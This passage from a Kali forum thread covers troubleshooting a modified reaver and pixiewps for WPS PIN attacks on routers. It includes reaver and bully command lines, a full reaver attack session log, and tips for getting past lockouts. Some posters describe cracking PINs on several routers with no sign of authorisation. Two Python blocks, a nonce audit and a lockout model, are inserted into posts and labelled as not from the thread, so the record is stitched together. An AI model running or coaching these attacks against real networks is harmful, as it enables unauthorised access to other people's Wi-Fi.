    + https://www.kali.org/penetration-tes...ck-ng-updates/

  24. #74
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Congrats!

    Could these guys have a dedicated R&D forum section maybe? Feels like walking on eggshells whenever discussing R&D.

  25. #75
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    Heard there may be a video tutorial soon, showing how to use the new pixiewps 1.1 with reaver??

    Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??


    We are working on it.

    I'm a little overworked, but I will make the necessary updates.


    I'm sorry for the delay in updates these past few weeks, I'm full of work.

  26. #76
    Join Date
    2015-Mar
    Posts
    127
    @t6x
    Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.

  27. #77
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    @t6x
    Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.
    If some tests I'm doing work, we will have some news in a few weeks.


  28. #78
    Join Date
    2015-Mar
    Posts
    127
    If u need hash collection or beta test, I'm available

  29. #79
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by nuroo View Post
    If u need hash collection or beta test, I'm available
    With my limited time today, I'll try to look at that Greenwave data you sent me

    AND can you get me a beacon frame from it?
    Last edited by soxrok2212; 2015-05-04 at 18:51.

  30. #80
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by soxrok2212 View Post
    With my limited time today, I'll try to look at that Greenwave data you sent me

    AND can you get me a beacon frame from it?
    should be a beacon frame in the greenwave cap file i posted
    http://d-h.st/9dE1
    Last edited by aanarchyy; 2015-05-04 at 19:17.

  31. #81
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by aanarchyy View Post
    should be a beacon frame in the greenwave cap file i posted
    http://d-h.st/9dE1
    Ah, I think I passed right over that, thanks. I'm moving over to the original pixie dust thread because this doesn't really pertain to Reaver...
    Last edited by soxrok2212; 2015-05-04 at 19:29.

  32. #82
    Join Date
    2015-Apr
    Posts
    39
    There is already a new update on GitHub.

    It was already using the new pixiewps; Wiire had updated reaver to work with it, and now I have made some adjustments to make it a little more automated.

    I improved the code too.

  33. #83
    Join Date
    2015-Apr
    Posts
    39
    There is already a new update on GitHub.

    Bug fixes

  34. #84
    Join Date
    2015-Jun
    Posts
    2
    Hey,
    I tried to test forked reaver & Pixiewps on a supposedly invulnerable "D-Link RTL 8671 EV 2006 27 07 (Realtek)".

    1. Used reaver -i mon0 -b bssid -v -K 1 (didn't use -S, as it's a Realtek chip)
    Got all the arguments for pixiewps.
    Result found as...
    a. No WPS pin found
    b. WPS Pin = 12345670 (when the -f argument was used with pixiewps)


    2. Now tried to use WPS Generator

    3 pins came out. When I tried to use them to find the passphrase, Reaver never proceeds further.

    Which pin is correct? When I use --pin in reaver, Reaver just gets stuck in loops and then gets locked out after 10 tries.

  35. #85
    Join Date
    2015-Apr
    Posts
    39
    https://forums.kali.org/showthread.p...t-Attack/page5

    Read the page 5 for pin generator

  36. #86
    Join Date
    2015-Jun
    Posts
    2
    Thanks for the reply. Got the logic. Apparently none of the 3 pins was correct. All tries led to lockout. PixieWPS also not working on RTL8671. Normal Reaver attack stops @ the 11th pin, and after that "25 Successive Start Failures". Is the RTL8671 unhackable? ***I am going to lose the bet***

  37. #87
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by Vinit2512 View Post
    Thanks for the reply. Got the logic. Apparently none of the 3 pins was correct. All tries led to lockout. PixieWPS also not working on RTL8671. Normal Reaver attack stops @ the 11th pin, and after that "25 Successive Start Failures". Is the RTL8671 unhackable? ***I am going to lose the bet***
    The RTL8671 is certainly different. It is a SoC (System on Chip), which means pretty much everything is done on that chip... different than your average AP. SoCs are generally found in DSL+Cable+Fiber/Router combo devices, which leads me to think that they use a different PRNG.

    The good news: When I first noticed the static E-Nonce on Realtek devices it kinda told me that their implementation was insecure. Again, seeing a strange nonce following the XX:XX:00:00 pattern, it leads me to think their implementation here is broken also. Wiire and I are looking at it and if we can't find anything, I'll talk with Dominique Bongard. All great people to work with and I love having the pleasure of being able to

    --I will move to the Pixie Dust thread since this does not pertain to Reaver
    Last edited by soxrok2212; 2015-06-03 at 15:15.
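    As an added example, not from the thread, here is a Python audit for the two enrollee-nonce symptoms this reply names (a static E-Nonce repeated across sessions, and a structured nonce with fixed zero bytes like the XX:XX:00:00 pattern): given the E-Nonce from several captured WPS sessions of one device, it reports repeats, byte positions that are always zero, and a crude pooled-entropy estimate. All three session lists are constructed; the "static" scenario just repeats the AirTies nonce posted in #51 three times to show the check firing, which is not a claim about that device. Function names are mine.

```python
"""Heuristic screen for weak enrollee nonces across captured WPS sessions.

Added example (not from the thread). Inputs are the E-Nonce values a
capture shows for successive sessions of one device. A healthy enrollee
draws a fresh 128-bit random nonce each time; a broken generator shows up
as repeats, fixed structure (always-zero bytes) or a very skewed byte
distribution. This is a screen for obviously bad output, not a proof of
randomness.
"""
from collections import Counter
import math


def parse_nonce(text):
    """'c4:2a:...' -> bytes."""
    return bytes.fromhex(text.replace(":", ""))


def byte_entropy(data):
    """Shannon entropy of the byte distribution, in bits per byte (max 8)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def audit_nonces(nonces, min_entropy=3.0):
    """nonces: E-Nonce values (bytes), one per session, same device.
    Returns (findings, stats); an empty findings list means nothing obviously
    wrong was seen."""
    if not nonces:
        return ["no sessions"], {}
    findings = []
    if any(len(n) != 16 for n in nonces):
        findings.append("nonce length is not 128 bits")
    distinct = len(set(nonces))
    if len(nonces) > 1 and distinct == 1:
        findings.append("static nonce: identical in every session")
    elif distinct < len(nonces):
        findings.append(f"nonce reuse: {len(nonces) - distinct} repeated value(s)")
    # A byte position that is 0x00 in every session points at a counter- or
    # time-based generator rather than a 128-bit random draw.
    fixed_zero = [i for i in range(16)
                  if all(len(n) == 16 and n[i] == 0 for n in nonces)]
    if fixed_zero:
        findings.append(f"bytes {fixed_zero} are always zero")
    ent = byte_entropy(b"".join(nonces))
    if ent < min_entropy:
        findings.append(f"low byte entropy: {ent:.2f} bits/byte")
    return findings, {"sessions": len(nonces), "distinct": distinct,
                      "entropy": round(ent, 2)}


def audit_hex(session_nonces, **kw):
    """Convenience wrapper taking the colon-separated strings reaver prints."""
    return audit_nonces([parse_nonce(s) for s in session_nonces], **kw)


# Constructed scenarios.
# 1. Four sessions with look-alike random nonces (hand-written, not captured).
HEALTHY_SESSIONS = [
    "9f:31:c0:7e:5a:02:e8:d4:1b:6c:a7:f3:48:95:2d:b6",
    "04:d2:7b:e9:3c:81:56:af:c7:1e:98:63:f0:2a:b5:4d",
    "e3:58:1a:c6:94:0f:b2:7d:69:d5:3e:a1:8c:47:f6:20",
    "71:ac:05:d8:4f:b3:26:e1:9a:c4:7f:13:d9:68:0e:b5",
]
# 2. The nonce posted in #51, repeated as if the device never changed it.
STATIC_SESSIONS = ["c4:2a:3f:a5:73:1e:12:3f:24:4e:5c:86:8c:cb:07:34"] * 3
# 3. An XX:XX:00:00... shape: only the second byte moves between sessions.
STRUCTURED_SESSIONS = [
    "1a:2b" + ":00" * 14,
    "1a:2c" + ":00" * 14,
    "1a:2d" + ":00" * 14,
    "1a:2e" + ":00" * 14,
]

if __name__ == "__main__":
    for name, sessions in [("healthy", HEALTHY_SESSIONS),
                           ("static", STATIC_SESSIONS),
                           ("structured", STRUCTURED_SESSIONS)]:
        findings, stats = audit_hex(sessions)
        print(name, stats, findings or "no findings")
```

    The entropy threshold is deliberately low: pooled over a handful of 16-byte nonces even perfect randomness only reaches about 6 bits per byte, so the check is meant to catch the near-constant output of a broken generator, not to grade a good one.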

  38. #88
    Join Date
    2015-Jun
    Posts
    2
    Hi guys,

    First, thank you very much for coming up and posting this great idea.

    I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
    I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

    This is the output I get:

    > reaver -i wlan1mon -c 6 -b 04:**:**:**:**:** -vv -S

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

    [+] Switching wlan1mon to channel 6
    [+] Waiting for beacon from 04:**:**:**:**:**
    [+] Associated with 04:**:**:**:**:** (ESSID: *****)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 1
    [+] Pin count advanced: 1. Max pin attempts: 11000
    [+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    ^C
    [+] Session saved.
    Any ideas?

    Thanks!

  39. #89
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by Azul View Post
    Hi guys,

    First, thank you very much for coming up and posting this great idea.

    I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
    I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

    This is the output I get:



    Any ideas?

    Thanks!
    Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.

  40. #90
    Join Date
    2013-May
    Posts
    35
    On some Technicolor routers the modified reaver recovers the pin but not the passphrase; it freezes on

    [+] Running reaver with the correct pin, wait ...
    [+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
    [Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
    [Reaver Test] [+] Channel: 11
    If such a thing happens, use bully to recover it.
    Example:
    bully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx
    It worked for me.

    @Vinit2512 the RTL8671 is hackable (tested)
    Last edited by bahha; 2015-06-14 at 14:13.

  41. #91
    Join Date
    2015-Jun
    Posts
    2
    Quote Originally Posted by soxrok2212 View Post
    Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.
    Thanks soxrok2212, it worked

  42. #92
    Join Date
    2013-Jul
    Posts
    818
    To soxrok2212

    Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

    Which variable ie -vv or -vvv is supposed to provide all data?

    MTeams

  43. #93
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by mmusket33 View Post
    To soxrok2212

    Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

    Which variable ie -vv or -vvv is supposed to provide all data?

    MTeams
    Make sure you are actually running the version of reaver you compile...

    -vv will give you the standard Reaver 1.4 -vv output, Received M1, Sending M2, etc.

    -vvv will print all the pixie dust information (PKE, PKR, E-Hash1, etc).

  44. #94
    Join Date
    2015-Jul
    Posts
    3
    hello.

    I managed to get 3 pins off 3 different routers, but whenever reaver goes into the second part of the cracking it just hangs at the test channel, and when I check airodump the router no longer shows WPS enabled, like it turned off when I got the pin.
    Is there a way to re-enable it? They were on before I tried reaver on them.

  45. #95
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by contevo View Post
    hello.

    I managed to get 3 pins off 3 different routers, but whenever reaver goes into the second part of the cracking it just hangs at the test channel, and when I check airodump the router no longer shows WPS enabled, like it turned off when I got the pin.
    Is there a way to re-enable it? They were on before I tried reaver on them.
    Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?
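    The lockout behaviour described in this reply, together with the "locked out after 10 tries" and "25 Successive Start Failures" reports earlier in the thread, is the registrar-side mitigation against PIN guessing. As an added example, not code from reaver, bully or any vendor firmware, here is a small Python model of such a policy with the thresholds as constructor parameters, so the difference between a temporary lock and a permanent WPS disable that only an administrator can clear is visible. Class and method names are mine; time is passed in explicitly so the model runs deterministically.

```python
"""Model of a WPS registrar's PIN-attempt lockout policy (added example).

Not vendor code. It models what the thread reports from the AP side: an AP
that locks WPS after a run of failed PIN exchanges (the 'locked out after
10 tries' case) and an AP that switches WPS off outright after a single
failure until an administrator re-enables it.
"""


class WpsLockoutPolicy:
    def __init__(self, max_failures=10, lock_seconds=60, disable_after=None):
        """max_failures: consecutive failed PIN attempts before a temporary lock.
        lock_seconds: how long that lock lasts.
        disable_after: total failures after which WPS is disabled until an
        administrator re-enables it (None = never)."""
        self.max_failures = max_failures
        self.lock_seconds = lock_seconds
        self.disable_after = disable_after
        self.consecutive_failures = 0
        self.total_failures = 0
        self.locked_until = 0.0
        self.disabled = False

    def state(self, now):
        """'open', 'locked' (temporary, expires) or 'disabled' (needs admin)."""
        if self.disabled:
            return "disabled"
        if now < self.locked_until:
            return "locked"
        return "open"

    def attempt(self, pin_correct, now):
        """Process one PIN exchange at time `now`.
        Returns 'accepted', 'rejected', 'locked' or 'disabled'."""
        st = self.state(now)
        if st != "open":
            return st            # exchange refused, nothing learned about the PIN
        if pin_correct:
            self.consecutive_failures = 0
            return "accepted"
        self.consecutive_failures += 1
        self.total_failures += 1
        if self.disable_after is not None and self.total_failures >= self.disable_after:
            self.disabled = True
            return "disabled"
        if self.consecutive_failures >= self.max_failures:
            self.locked_until = now + self.lock_seconds
            self.consecutive_failures = 0
            return "locked"
        return "rejected"

    def admin_reenable(self):
        """Only an administrator action clears a permanent disable."""
        self.disabled = False
        self.total_failures = 0
        self.consecutive_failures = 0
        self.locked_until = 0.0


def simulate(policy, outcomes, interval=1.0):
    """Feed a sequence of attempt outcomes (True = correct PIN), one `interval`
    apart starting at t=0, and return the registrar's response to each."""
    return [policy.attempt(ok, i * interval) for i, ok in enumerate(outcomes)]


if __name__ == "__main__":
    lenient = WpsLockoutPolicy(max_failures=10, lock_seconds=60)
    print("lock after 10:", simulate(lenient, [False] * 12))
    strict = WpsLockoutPolicy(max_failures=10, disable_after=1)
    print("disable after 1:", simulate(strict, [False, False, True]))
```

    The strict policy is exactly what the reply describes: once WPS is disabled after the first failure, even the later correct PIN is refused, and nothing short of admin_reenable() (a reboot or a settings change on a real device) brings it back.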

  46. #96
    Join Date
    2015-Jul
    Posts
    3
    Quote Originally Posted by soxrok2212 View Post
    Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?
    I can't get the chipset on them because on those routers, as soon as reaver cracked the pin, they no longer show WPS enabled, and I waited a whole day thinking maybe they would come on again, but nope.

  47. #97
    Join Date
    2015-Mar
    Posts
    141
    Ported to Android!

    Will update soon with link to build script on my github.

    Binaries of pixiewps and t6x-reaver.

    http://www.mediafire.com/download/bw...android.tar.gz
    Last edited by aanarchyy; 2015-08-22 at 23:56.

  48. #98
    Join Date
    2015-Aug
    Posts
    5
    having problems with the prereqs

    root@kali:~# apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzip
    Reading package lists... Done
    Building dependency tree
    Reading state information... Done
    libssl-dev is already the newest version.
    unzip is already the newest version.
    unzip set to manually installed.
    sqlite3 is already the newest version.
    sqlite3 set to manually installed.
    Some packages could not be installed. This may mean that you have
    requested an impossible situation or if you are using the unstable
    distribution that some required packages have not yet been created
    or been moved out of Incoming.
    The following information may help to resolve the situation:

    The following packages have unmet dependencies:
    libpcap-dev : Depends: libpcap0.8-dev but it is not going to be installed
    libsqlite3-dev : Depends: libsqlite3-0 (= 3.7.16.2-1~bpo70+1) but 3.8.7.1-1+deb8u1 is to be installed
    E: Unable to correct problems, you have held broken packages.

  49. #99
    Join Date
    2015-Nov
    Location
    Russia
    Posts
    6
    what is force mode?
    "Try again with --force or with another (newer) set of data"
    and how should I use it?

  50. #100
    Join Date
    2015-Apr
    Posts
    29
    Quote Originally Posted by ravenwest View Post
    what is force mode?
    "Try again with --force or with another (newer) set of data"
    and how should I use it?
    https://github.com/wiire/pixiewps
    If the following message is shown:

    [!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

    then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.
    Last edited by Laserman75; 2015-11-25 at 01:11.
